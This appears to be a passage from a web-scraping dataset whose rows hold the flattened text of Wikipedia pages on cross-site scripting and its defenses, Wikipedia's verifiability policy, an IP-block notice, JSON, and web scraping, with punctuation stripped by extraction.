most experts distinguish between at least two primary flavors of XSS flaws: non-persistent and persistent. Some sources further divide these two groups into traditional (caused by server-side code flaws) and DOM-based (in client-side code). The non-persistent (or reflected) cross-site scripting vulnerability is by far the most basic type of web vulnerability. 10 These holes show up when the data provided by a web client, 11 most commonly in HTTP query parameters (e.g. HTML form submission), is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the content. 12 Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding, may lead to markup injection. 10 12 A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly escape or reject HTML control characters, a cross-site scripting flaw will ensue. 13 A reflected attack is typically delivered via email or a neutral web site. The bait is an innocent-looking URL, pointing to a trusted site but containing the XSS vector. If the trusted site is vulnerable to the vector, clicking the link can cause the victim's browser to execute the injected script. The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read. 12 For example, suppose there is a dating website where members scan the profiles of other members to see if they look interesting. For privacy reasons, this site hides everybody's real name and email. These are kept secret on the server. The only time a member's real name and email are in the browser is when the member is signed in, and they can't see anyone else's. Suppose that Mallory, an attacker, joins the site and wants to figure out the real names of the people she sees on the site. To do so, she writes a script designed to run from other users' browsers when they visit her profile. The script then sends a quick message to her own server, which collects this information. To do this, for the question "Describe your Ideal First Date", Mallory gives a short answer (to appear normal), but the text at the end of her answer is her script to steal names and emails. If the script is enclosed inside a script element, it won't be shown on the screen. Then suppose that Bob, a member of the dating site, reaches Mallory's profile, which has her answer to the First Date question. Her script is run automatically by the browser and steals a copy of Bob's real name and email directly from his own machine. Persistent XSS vulnerabilities can be more significant than other types because an attacker's malicious script is rendered automatically, without the need to individually target victims or lure them to a third-party website. Particularly in the case of social networking sites, the code would be further designed to self-propagate across accounts, creating a type of client-side worm. 14 The methods of injection can vary a great deal; in some cases, the attacker may not even need to directly interact with the web functionality itself to exploit such a hole. Any data received by the web application (via email, system logs, IM etc.) that can be controlled by an attacker could become an injection vector. XSS vulnerabilities were originally found in applications that performed all data processing on the server side. User input (including an XSS vector) would be sent to the server, and then sent back to the user as a web page. The need for an improved user experience resulted in popularity of applications that had a majority of the presentation logic (maybe written in JavaScript) working on the client-side that pulled data, on-demand, from the server using AJAX. As the JavaScript code was also processing user input and rendering it in the web page content, a new sub-class of reflected XSS attacks started to appear that was called DOM-based cross-site scripting. In a DOM-based XSS attack, the malicious data does not touch the web server. Rather, it is being reflected by the JavaScript code, fully on the client side. 15 An example of a DOM-based XSS vulnerability is the bug found in 2011 in a number of jQuery plugins. 16 Prevention strategies for DOM-based XSS attacks include very similar measures to traditional XSS prevention strategies but implemented in JavaScript code and contained in web pages (i.e. input validation and escaping). 17 Some JavaScript frameworks have built-in countermeasures against this and other types of attack — for example AngularJS. 18 Self-XSS is a form of XSS vulnerability that relies on social engineering in order to trick the victim into executing malicious JavaScript code in their browser. Although it is technically not a true XSS vulnerability due to the fact it relies on socially engineering a user into executing code rather than a flaw in the affected website allowing an attacker to do so, it still poses the same risks as a regular XSS vulnerability if properly executed. 19 Mutated XSS happens when the attacker injects something that is seemingly safe but is rewritten and modified by the browser while parsing the markup. This makes it extremely hard to detect or sanitize within the website's application logic. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters on parameters to CSS font-family. There are several escaping schemes that can be used depending on where the untrusted string needs to be placed within an HTML document including HTML entity encoding, JavaScript escaping, CSS escaping, and URL (or percent) encoding. 20 Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS attacks in a fairly straightforward manner. Performing HTML entity encoding only on the five XML significant characters is not always sufficient to prevent many forms of XSS attacks, security encoding libraries are usually easier to use. 20 Some web template systems understand the structure of the HTML they produce and automatically pick an appropriate encoder. 21 22 23 Many operators of particular web applications (e.g. forums and webmail) allow users to utilize a limited subset of HTML markup. When accepting HTML input from users (say, b very b large), output encoding (such as lt;b gt;very lt; b gt; large) will not suffice since the user input needs to be rendered as HTML by the browser (so it shows as "very large", instead of b very b large"). Stopping an XSS attack when accepting HTML input from users is much more complex in this situation. Untrusted HTML input must be run through an HTML sanitization engine to ensure that it does not contain XSS code. Many validations rely on parsing out (blacklisting) specific "at risk" HTML tags such as the iframe tag, link and the script tag. There are several issues with this approach, for example sometimes seemingly harmless tags can be left out which when utilized correctly can still result in an XSS Another popular method is to strip user input of and however this can also be bypassed as the payload can be concealed with obfuscation. Besides content filtering, other imperfect methods for cross-site scripting mitigation are also commonly used. One example is the use of additional security controls when handling cookie-based user authentication. Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal these cookies. 24 To mitigate this particular threat (though not the XSS problem in general), many web applications tie session cookies to the IP address of the user who originally logged in, then only permit that IP to use that cookie. 25 This is effective in most situations (if an attacker is only after the cookie), but obviously breaks down in situations where an attacker is behind the same NATed IP address or web proxy as the victim, or the victim is changing his or her mobile IP. 25 Another mitigation present in Internet Explorer (since version 6), Firefox (since version 2.0.0.5), Safari (since version 4), Opera (since version 9.5) and Google Chrome, is an HttpOnly flag which allows a web server to set a cookie that is unavailable to client-side scripts. While beneficial, the feature can neither fully prevent cookie theft nor prevent attacks within the browser. 26 While Web 2.0 and Ajax developers require the use of JavaScript, 27 some web applications are written to allow operation without the need for any client-side scripts. 28 This allows users, if they choose, to disable scripting in their browsers before using the application. In this way, even potentially malicious client-side scripts could be inserted unescaped on a page, and users would not be susceptible to XSS attacks. Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis. This approach is of limited value if scripting is allowed by default, since it blocks bad sites only after the user knows that they are bad, which is too late. Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effective. This has been possible for a long time in Internet Explorer (since version 4) by setting up its so called "Security Zones", 29 and in Opera (since version 9) using its "Site Specific Preferences". 30 A solution for Firefox and other Gecko-based browsers is the open source NoScript add-on which, in addition to the ability to enable scripts on a per-domain basis, provides some XSS protection even when scripts are enabled. 31 The most significant problem with blocking all scripts on all websites by default is substantial reduction in functionality and responsiveness (client-side scripting can be much faster than server-side scripting because it does not need to connect to a remote server and the page or frame does not need to be reloaded). 32 Another problem with script blocking is that many users do not understand it, and do not know how to properly secure their browsers. Yet another drawback is that many sites do not work without client-side scripting, forcing users to disable protection for that site and opening their systems to vulnerabilities. 33 The Firefox NoScript extension enables users to allow scripts selectively from a given page while disallowing others on the same page. For example, scripts from example.com could be allowed, while scripts from advertisingagency.com that are attempting to run on the same page could be disallowed. 34 Content Security Policy (CSP) allows HTML documents to opt in to disabling some scripts while leaving others enabled. 35 The browser checks each script against a policy before deciding whether to run it. As long as the policy only allows trustworthy scripts and disallows dynamic code loading, the browser will not run programs from untrusted authors regardless of the HTML document's structure. Modern CSP policies allow using nonces to mark scripts in the HTML document as safe to run instead of keeping the policy entirely separate from the page content. 36 37 As long as trusted nonces only appear on trustworthy scripts, the browser will not run programs from untrusted authors. Some large application providers report having successfully deployed nonce-based policies. 38 39 Trusted types 40 changes Web APIs to check that values have been trademarked as trusted. As long as programs only trademark trustworthy values, an attacker who controls a JavaScript string value cannot cause XSS. Trusted types are designed to be auditable by blue teams. Another defense approach is to use automated tools that will remove XSS malicious code in web pages, these tools use static analysis and or pattern matching methods to identify malicious codes potentially and secure them using methods like escaping. 41 When a cookie is set with the SameSite Strict parameter, it is stripped from all cross-origin requests. When set with SameSite Lax, it is stripped from all non "safe" cross-origin requests (that is, requests other than GET, OPTIONS, and TRACE which have read-only semantics). 42 The feature is implemented in Google Chrome since version 63 and Firefox since version 60. 43 |
443 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:Verifiability | In the English Wikipedia, verifiability means people using the encyclopedia can check that the information comes from a reliable source. Its content is determined by previously published information rather than editors' beliefs, opinions, experiences, or previously unpublished ideas or information. Even if you are sure something is true, it must have been previously published in a reliable source before you can add it. a If reliable sources disagree with each other, then maintain a neutral point of view and present what the various sources say, giving each side its due weight. All material in Wikipedia mainspace, including everything in articles, lists, and captions, must be verifiable. Additionally, four types of information must be accompanied by an inline citation to a reliable source that directly supports b the material. The four types are: Any material that needs an inline citation but does not have one may be removed. Please immediately remove contentious material about living people (or existing groups) that is unsourced or poorly sourced. For how to write citations, see citing sources. Verifiability, no original research, and neutral point of view are Wikipedia's core content policies. They work together to determine content, so editors should understand the key points of all three. Articles must also comply with the copyright policy. All content must be verifiable. The burden to demonstrate verifiability lies with the editor who adds or restores material, and it is satisfied by providing an inline citation to a reliable source that directly supports b the contribution. c Using inline citations, provide reliable, published sources for all: The cited source must clearly support the material as presented in the article. Cite the source clearly, ideally giving page number(s)—though sometimes a section, chapter, or other division may be appropriate instead; see Wikipedia:Citing sources for details of how to do this. Any material lacking an inline citation to a reliable source that directly supports b the material may be removed and should not be restored without an inline citation to a reliable source. Whether and how quickly material should be initially removed for not having an inline citation to a reliable source depends on the material and the overall state of the article. In some cases, editors may object if you remove material without giving them time to provide references. Consider adding a citation needed tag as an interim step. d When tagging or removing material for lacking an inline citation, please state your concern that it may not be possible to find a published reliable source, and the material therefore may not be verifiable. e If you think the material is verifiable, you are encouraged to provide an inline citation yourself before considering whether to remove or tag it. Do not leave unsourced or poorly sourced material in an article if it might damage the reputation of living people 1 or existing groups, and do not move it to the talk page. You should also be aware of how Wikipedia:Biographies of living persons also applies to groups. A cited source on Wikipedia is often a specific portion of text (such as a short article or a page in a book). But when editors discuss sources (for example, to debate their appropriateness or reliability) the word source has four related meanings: All four can affect reliability. Base articles on reliable, independent, published sources with a reputation for fact-checking and accuracy. Source material must have been published, the definition of which for the purposes of Wikipedia is made available to the public in some form. f Unpublished materials are not considered reliable. Use sources that directly support the material presented in an article and are appropriate to the claims made. The appropriateness of any source depends on the context. Be especially careful when sourcing content related to living people or medicine. If available, academic and peer-reviewed publications are usually the most reliable sources on topics such as history, medicine, and science. Editors may also use material from reliable non-academic sources, particularly if it appears in respected mainstream publications. Other reliable sources include: Editors may also use electronic media, subject to the same criteria (see details in Wikipedia:Identifying reliable sources and Wikipedia:Search engine test). The best sources have a professional structure for checking or analyzing facts, legal issues, evidence, and arguments. The greater the degree of scrutiny given to these issues, the more reliable the source. Some newspapers, magazines, and other news organizations host online pages, columns or rolling text they call blogs. These may be acceptable sources if the writers are professionals, but use them with caution because blogs may not be subject to the news organization's normal fact-checking process. g If a news organization publishes an opinion piece in a blog, attribute the statement to the writer, e.g. "Jane Smith wrote ... Never use the blog comments that are left by the readers as sources. For personal or group blogs that are not reliable sources, see Self-published sources below. To discuss the reliability of a specific source for a particular statement, consult Wikipedia:Reliable sources Noticeboard, which seeks to apply this policy to particular cases. For a guideline discussing the reliability of particular types of sources, see Wikipedia:Reliable sources. In the case of inconsistency between this policy and the Wikipedia:Reliable sources guideline, or any other guideline related to sourcing, this policy has priority. Questionable sources are those that have a poor reputation for checking the facts, lack meaningful editorial oversight, or have an apparent conflict of interest. Such sources include websites and publications expressing views widely considered by other sources to be promotional, extremist, or relying heavily on unsubstantiated gossip, rumor, or personal opinion. Questionable sources should be used only as sources for material on themselves, such as in articles about themselves; see below. They are not suitable sources for contentious claims about others. Predatory open access journals are considered questionable due to the absence of quality control in the peer-review process. Anyone can create a personal web page, self-publish a book, or claim to be an expert. That is why self-published material such as books, patents, newsletters, personal websites, open wikis, personal or group blogs (as distinguished from newsblogs, above), content farms, Internet forum postings, and social media postings are largely not acceptable as sources. Self-published expert sources may be considered reliable when produced by an established subject-matter expert, whose work in the relevant field has previously been published by reliable, independent publications. g Exercise caution when using such sources: if the information in question is suitable for inclusion, someone else will probably have published it in independent, reliable sources. 2 Never use self-published sources as third-party sources about living people, even if the author is an expert, well-known professional researcher, or writer. Self-published and questionable sources may be used as sources of information about themselves, usually in articles about themselves or their activities, without the self-published source requirement that they are established experts in the field, so long as: This policy also applies to material made public by the source on social networking websites such as Twitter, Tumblr, LinkedIn, Reddit, and Facebook. Do not use articles from Wikipedia (whether English Wikipedia or Wikipedias in other languages) as sources, since Wikipedia is a user-generated source. Also, do not use websites mirroring Wikipedia content or publications relying on material from Wikipedia as sources. Content from a Wikipedia article is not considered reliable unless it is backed up by citing reliable sources. Confirm that these sources support the content, then use them directly. 3 An exception is allowed when Wikipedia itself is being discussed in the article. These may cite an article, guideline, discussion, statistic, or other content from Wikipedia (or a sister project) to support a statement about Wikipedia. Wikipedia or the sister project is a primary source in this case and may be used following the policy for primary sources. Any such use should avoid original research, undue emphasis on Wikipedia's role or views, and inappropriate self-reference. The article text should clarify how the material is sourced from Wikipedia to inform the reader about the potential bias. Do not reject reliable sources just because they are difficult or costly to access. Some reliable sources are not easily accessible. For example, an online source may require payment, and a print-only source may be available only through libraries. Rare historical sources may even be available only in special museum collections and archives. If you have trouble accessing a source, others may be able to do so on your behalf (see WikiProject Resource Exchange). Citations to non-English reliable sources are allowed on the English Wikipedia. However, because this project is in English, English-language sources are preferred over non-English ones when they are available and of equal quality and relevance. As with sources in English, if a dispute arises involving a citation to a non-English source, editors may request a quotation of relevant portions of the original source be provided, either in text, in a footnote, or on the article talk page. h (See Template:Request quotation.) If you quote a non-English reliable source (whether in the main text or in a footnote), a translation into English should accompany the quote. Translations published by reliable sources are preferred over translations by Wikipedians, but translations by Wikipedians are preferred over machine translations. When using a machine translation of source material, editors should be reasonably certain that the translation is accurate and the source is appropriate. Editors should not rely upon machine translations of non-English sources in contentious articles or biographies of living people. If needed, ask an editor who can translate it for you. The original text is usually included with the translated text in articles when translated by Wikipedians, and the translating editor is usually not cited. When quoting any material, whether in English or in some other language, be careful not to violate copyright; see the fair-use guideline. While information must be verifiable for inclusion in an article, not all verifiable information must be included. Consensus may determine that certain information does not improve an article. Such information should be omitted or presented instead in a different article. The responsibility for achieving consensus for inclusion is on those seeking to include disputed content. If you want to request an inline citation for an unsourced statement, you can tag a sentence with the citation needed template by writing cn or fact . Other templates exist for tagging sections or entire articles here. You can also leave a note on the talk page asking for a source, or move the material to the talk page and ask for a source there. To request verification that a reference supports the text, tag it with verification needed . Material that fails verification may be tagged with failed verification or removed. It helps other editors to explain your rationale for using templates to tag material in the template, edit summary, or on the talk page. Take special care with contentious material about living and recently deceased people. Unsourced or poorly sourced material that is contentious, especially text that is negative, derogatory, or potentially damaging, should be removed immediately rather than tagged or moved to the talk page. Any exceptional claim requires multiple high-quality sources. 4 Warnings (red flags) that should prompt extra caution include: Do not plagiarize or breach copyright when using sources. Summarize source material in your own words as much as possible; when quoting or closely paraphrasing a source, use an inline citation, and in-text attribution where appropriate. Do not link to any source that violates the copyrights of others per contributors' rights and obligations. You can link to websites that display copyrighted works as long as the website has licensed the work or uses the work in a way compliant with fair use. Knowingly directing others to material that violates copyright may be considered contributory copyright infringement. If there is reason to think a source violates copyright, do not cite it. This is particularly relevant when linking to sites such as Scribd or YouTube, where due care should be taken to avoid linking to material violating copyright. Even when information is cited to reliable sources, you must present it with a neutral point of view (NPOV). Articles should be based on thorough research of sources. All articles must adhere to NPOV, fairly representing all majority and significant-minority viewpoints published by reliable sources, in rough proportion to the prominence of each view. Tiny-minority views need not be included, except in articles devoted to them. If there is a disagreement between sources, use in-text attribution: "John Smith argues X, while Paul Jones maintains Y, followed by an inline citation. Sources themselves do not need to maintain a neutral point of view. Indeed, many reliable sources are not neutral. Our job as editors is simply to summarize what reliable sources say. If no reliable, independent sources can be found on a topic, Wikipedia should not have an article on it (i.e., the topic is not notable). However, notability is based on the existence of suitable sources, not on the state of sourcing in an article (WP:NEXIST). The no original research policy (NOR) is closely related to the Verifiability policy. Among its requirements are: |
444 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=15 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
445 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/JSON | JSON (JavaScript Object Notation, pronounced d e s n or d e s n ) is an open standard file format and data interchange format that uses human-readable text to store and transmit data objects consisting of attribute value pairs and arrays (or other serializable values). It is a commonly used data format with diverse uses in electronic data interchange, including that of web applications with servers. JSON is a language-independent data format. It was derived from JavaScript, but many modern programming languages include code to generate and parse JSON-format data. JSON filenames use the extension .json. Douglas Crockford originally specified the JSON format in the early 2000s. 1 He and Chip Morningstar sent the first JSON message in April 2001. The 2017 international standard (ECMA 404 and ISO IEC 21778:2017) specifies that "JSON" is "pronounced d e .s n , as in 'Jason and The Argonauts' . 2 3 The first (2013) edition of ECMA 404 did not address the pronunciation. 4 The UNIX and Linux System Administration Handbook states, "Douglas Crockford, who named and promoted the JSON format, says it's pronounced like the name Jason. But somehow, 'JAY-sawn' a seems to have become more common in the technical community. 5 Crockford said in 2011, "There's a lot of argument about how you pronounce that, but I strictly don't care. 1 After RFC 4627 had been available as its "informational" specification since 2006, JSON was first standardized in 2013, as ECMA 404. 4 RFC 8259, published in 2017, is the current version of the Internet Standard STD 90, and it remains consistent with ECMA 404. 6 That same year, JSON was also standardized as ISO IEC 21778:2017. 2 The ECMA and ISO IEC standards describe only the allowed syntax, whereas the RFC covers some security and interoperability considerations. 7 JSON grew out of a need for a real-time server-to-browser session communication protocol without using browser plugins such as Flash or Java applets, the dominant methods used in the early 2000s. 8 Crockford first specified and popularized the JSON format. 1 The acronym originated at State Software, a company cofounded by Crockford and others in March 2001. The cofounders agreed to build a system that used standard browser capabilities and provided an abstraction layer for Web developers to create stateful Web applications that had a persistent duplex connection to a Web server by holding two Hypertext Transfer Protocol (HTTP) connections open and recycling them before standard browser time-outs if no further data were exchanged. The cofounders had a round-table discussion and voted on whether to call the data format JSML (JavaScript Markup Language) or JSON (JavaScript Object Notation), as well as under what license type to make it available. The JSON.org 9 website was launched in 2001. In December 2005, Yahoo began offering some of its Web services in JSON. 10 A precursor to the JSON libraries was used in a children's digital asset trading game project named Cartoon Orbit at Communities.com citation needed (the State cofounders had all worked at this company previously) for Cartoon Network citation needed , which used a browser side plug-in with a proprietary messaging format to manipulate DHTML elements (this system is also owned by 3DO citation needed ). Upon discovery of early Ajax capabilities, digiGroups, Noosh, and others used frames to pass information into the user browsers' visual field without refreshing a Web application's visual context, realizing real-time rich Web applications using only the standard HTTP, HTML, and JavaScript capabilities of Netscape 4.0.5 and Internet Explorer 5 . Crockford then found that JavaScript could be used as an object-based messaging format for such a system. The system was sold to Sun Microsystems, Amazon.com, and EDS. JSON was based on a subset of the JavaScript scripting language (specifically, Standard ECMA 262 3rd Edition—December 1999 11 ) and is commonly used with JavaScript, but it is a language-independent data format. Code for parsing and generating JSON data is readily available in many programming languages. JSON's website lists JSON libraries by language. In October 2013, Ecma International published the first edition of its JSON standard ECMA 404. 4 That same year, RFC 7158 used ECMA 404 as a reference. In 2014, RFC 7159 became the main reference for JSON's Internet uses, superseding RFC 4627 and RFC 7158 (but preserving ECMA 262 and ECMA 404 as main references). In November 2017, ISO IEC JTC 1 SC 22 published ISO IEC 21778:2017 2 as an international standard. On December 13, 2017, the Internet Engineering Task Force obsoleted RFC 7159 when it published RFC 8259, which is the current version of the Internet Standard STD 90. 12 13 Crockford added a clause to the JSON license stating, "The Software shall be used for Good, not Evil", in order to open-source the JSON libraries while mocking corporate lawyers and those who are overly pedantic. On the other hand, this clause led to license compatibility problems of the JSON license with other open-source licenses since open-source software and free software usually imply no restrictions on the purpose of use. 14 The following example shows a possible JSON representation describing a person. Although Crockford originally asserted that JSON is a strict subset of JavaScript and ECMAScript, 15 his specification actually allows valid JSON documents that are not valid JavaScript; JSON allows the Unicode line terminators U 2028 LINE SEPARATOR and U 2029 PARAGRAPH SEPARATOR to appear unescaped in quoted strings, while ECMAScript 2018 and older do not. 16 17 This is a consequence of JSON disallowing only "control characters". For maximum portability, these characters should be backslash-escaped. JSON exchange in an open ecosystem must be encoded in UTF 8. 6 The encoding supports the full Unicode character set, including those characters outside the Basic Multilingual Plane (U 0000 to U FFFF). However, if escaped, those characters must be written using UTF 16 surrogate pairs. For example, to include the Emoji character U 1F610 NEUTRAL FACE in JSON: JSON became a strict subset of ECMAScript as of the language's 2019 revision. 17 18 JSON's basic data types are: Whitespace is allowed and ignored around or between syntactic elements (values and punctuation, but not within a string value). Four specific characters are considered whitespace for this purpose: space, horizontal tab, line feed, and carriage return. In particular, the byte order mark must not be generated by a conforming implementation (though it may be accepted when parsing JSON). JSON does not provide syntax for comments. 21 Early versions of JSON (such as specified by RFC 4627) required that a valid JSON text must consist of only an object or an array type, which could contain other types within them. This restriction was dropped in RFC 7158, where a JSON text was redefined as any serialized value. Numbers in JSON are agnostic with regard to their representation within programming languages. While this allows for numbers of arbitrary precision to be serialized, it may lead to portability issues. For example, since no differentiation is made between integer and floating-point values, some implementations may treat 42, 42.0, and 4.2E 1 as the same number, while others may not. The JSON standard makes no requirements regarding implementation details such as overflow, underflow, loss of precision, rounding, or signed zeros, but it does recommend expecting no more than IEEE 754 binary64 precision for "good interoperability". There is no inherent precision loss in serializing a machine-level binary representation of a floating-point number (like binary64) into a human-readable decimal representation (like numbers in JSON) and back since there exist published algorithms to do this exactly and optimally. 22 Comments were intentionally excluded from JSON. In 2012, Douglas Crockford described his design decision thus: "I removed comments from JSON because I saw people were using them to hold parsing directives, a practice which would have destroyed interoperability. 21 JSON disallows "trailing commas", a comma after the last value inside a data structure. 23 Trailing commas are a common feature of JSON derivatives to improve ease of use. 24 RFC 8259 describes certain aspects of JSON syntax that, while legal per the specifications, can cause interoperability problems. In 2015, the IETF published RFC 7493, describing the "I-JSON Message Format", a restricted profile of JSON that constrains the syntax and processing of JSON to avoid, as much as possible, these interoperability issues. While JSON provides a syntactic framework for data interchange, unambiguous data interchange also requires agreement between producer and consumer on the semantics of specific use of the JSON syntax. 25 One example of where such an agreement is necessary is the serialization of data types that are not part of the JSON standard, for example, dates and regular expressions. The official MIME type for JSON text is application json, 26 and most modern implementations have adopted this. Legacy MIME types include text json, text x-json, and text javascript. 27 JSON Schema specifies a JSON-based format to define the structure of JSON data for validation, documentation, and interaction control. It provides a contract for the JSON data required by a given application and how that data can be modified. 28 JSON Schema is based on the concepts from XML Schema (XSD) but is JSON-based. As in XSD, the same serialization deserialization tools can be used both for the schema and data, and it is self-describing. It is specified in an Internet Draft at the IETF, with the latest version as of 2024 being "Draft 2020 12". 29 There are several validators available for different programming languages, 30 each with varying levels of conformance. The standard filename extension is .json. 31 The JSON standard does not support object references, but an IETF draft standard for JSON-based object references exists. 32 JSON-RPC is a remote procedure call (RPC) protocol built on JSON, as a replacement for XML-RPC or SOAP. It is a simple protocol that defines only a handful of data types and commands. JSON-RPC lets a system send notifications (information to the server that does not require a response) and multiple calls to the server that can be answered out of order. Asynchronous JavaScript and JSON (or AJAJ) refers to the same dynamic web page methodology as Ajax, but instead of XML, JSON is the data format. AJAJ is a web development technique that provides for the ability of a web page to request new data after it has loaded into the web browser. Typically, it renders new data from the server in response to user actions on that web page. For example, what the user types into a search box, client-side code then sends to the server, which immediately responds with a drop-down list of matching database items. JSON has seen ad hoc usage as a configuration language. However, it does not support comments. In 2012, Douglas Crockford, JSON creator, had this to say about comments in JSON when used as a configuration language: "I know that the lack of comments makes some people sad, but it shouldn't. Suppose you are using JSON to keep configuration files, which you would like to annotate. Go ahead and insert all the comments you like. Then pipe it through JSMin 33 before handing it to your JSON parser. 21 MongoDB uses JSON-like data for its document-oriented database. Some relational databases, such as PostgreSQL and MySQL, have added support for native JSON data types. This allows developers to store JSON data directly in a relational database without having to convert it to another data format. JSON being a subset of JavaScript can lead to the misconception that it is safe to pass JSON texts to the JavaScript eval() function. This is not safe, due to certain valid JSON texts, specifically those containing U 2028 LINE SEPARATOR or U 2029 PARAGRAPH SEPARATOR, not being valid JavaScript code until JavaScript specifications were updated in 2019, and so older engines may not support it. 34 To avoid the many pitfalls caused by executing arbitrary code from the Internet, a new function, JSON.parse(), was first added to the fifth edition of ECMAScript, 35 which as of 2017 is supported by all major browsers. For non-supported browsers, an API-compatible JavaScript library is provided by Douglas Crockford. 36 In addition, the TC39 proposal "Subsume JSON" made ECMAScript a strict JSON superset as of the language's 2019 revision. 17 18 Various JSON parser implementations have suffered from denial-of-service attack and mass assignment vulnerability. 37 38 JSON is promoted as a low-overhead alternative to XML as both of these formats have widespread support for creation, reading, and decoding in the real-world situations where they are commonly used. 39 Apart from XML, examples could include CSV and supersets of JSON. Google Protocol Buffers can fill this role, although it is not a data interchange language. CBOR has a superset of the JSON data types, but it is not text-based. XML has been used to describe structured data and to serialize objects. Various XML-based protocols exist to represent the same kind of data structures as JSON for the same kind of data interchange purposes. Data can be encoded in XML in several ways. The most expansive form using tag pairs results in a much larger (in character count) representation than JSON, but if data is stored in attributes and 'short tag' form where the closing tag is replaced with , the representation is often about the same size as JSON or just a little larger. However, an XML attribute can only have a single value and each attribute can appear at most once on each element. XML separates "data" from "metadata" (via the use of elements and attributes), while JSON does not have such a concept. Another key difference is the addressing of values. JSON has objects with a simple "key" to "value" mapping, whereas in XML addressing happens on "nodes", which all receive a unique ID via the XML processor. Additionally, the XML standard defines a common attribute xml:id, that can be used by the user, to set an ID explicitly. XML tag names cannot contain any of the characters () , ; ? , nor a space character, and cannot begin with , ., or a numeric digit, whereas JSON keys can (even if quotation mark and backslash must be escaped). 40 XML values are strings of characters, with no built-in type safety. XML has the concept of schema, that permits strong typing, user-defined types, predefined tags, and formal structure, allowing for formal validation of an XML stream. JSON has several types built-in and has a similar schema concept in JSON Schema. XML supports comments, while JSON does not. 41 21 Support for comments and other features have been deemed useful, which has led to several nonstandard JSON supersets being created. Among them are HJSON, 42 HOCON, and JSON5 (which despite its name, is not the fifth version of JSON). 43 44 YAML version 1.2 is a superset of JSON; prior versions were not strictly compatible. For example, escaping a slash with a backslash is valid in JSON, but was not valid in YAML. 45 YAML supports comments, while JSON does not. 45 43 21 CSON ("CoffeeScript Object Notation") uses significant indentation, unquoted keys, and assumes an outer object declaration. It was used for configuring GitHub's Atom text editor. 46 47 48 There is also an unrelated project called CSON ("Cursive Script Object Notation") that is more syntactically similar to JSON. 49 HOCON ("Human-Optimized Config Object Notation") is a format for human-readable data, and a superset of JSON. 50 The uses of HOCON are: JSON5 ("JSON5 Data Interchange Format") is an extension of JSON syntax that just like JSON is also valid JavaScript syntax. The specification was started in 2012 and finished in 2018 with version 1.0.0. 61 The main differences to JSON syntax are: JSON5 syntax is supported in some software as an extension of JSON syntax, for instance in SQLite. 62 JSONC (JSON with Comments) is a subset of JSON5 used in Microsoft's Visual Studio Code: 63 Several serialization formats have been built on or from the JSON specification. Examples include |
446 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#India | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism 